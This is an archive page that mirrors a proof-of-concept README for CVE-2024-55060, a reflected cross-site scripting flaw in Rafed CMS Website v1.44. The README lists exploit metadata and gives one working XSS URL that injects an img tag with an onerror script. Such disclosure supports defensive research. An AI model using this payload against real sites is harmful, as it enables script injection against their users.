Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-55060 PoC — Rafed CMS 安全漏洞

Source
https://github.com/bigzooooz/CVE-2024-55060
Associated Vulnerability
Title:Rafed CMS 安全漏洞 (CVE-2024-55060)
Description:A cross-site scripting (XSS) vulnerability in the component index.php of Rafed CMS Website v1.44 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
Readme
# CVE-2024-55060

Rafed CMS Website v1.44 - Cross Site Scripting (XSS)

#### Exploit Title: Rafed CMS Website v1.44 - Cross Site Scripting (XSS)
#### Date: 2024-03-12
#### CVE: CVE-2024-55060
#### Exploit Author: Abdulaziz Saad (@b4zb0z)
#### Vendor Homepage: https://www.rafed-system.org/
#### Software Link: N/A
#### Version: 1.44
#### Tested on: Apache, Linux

-----

#### [#] Vulnerability Location:

  `index.php?">{XSS_Payload]` in `index.php`

----

#### [#] Exploitation:

  `https://localhost/?%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E`
File Snapshot

 [4.0K]  /data/pocs/bc5cfe1b3714dd06dec44e7807e938f30fa2e7e7
└── [ 547]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →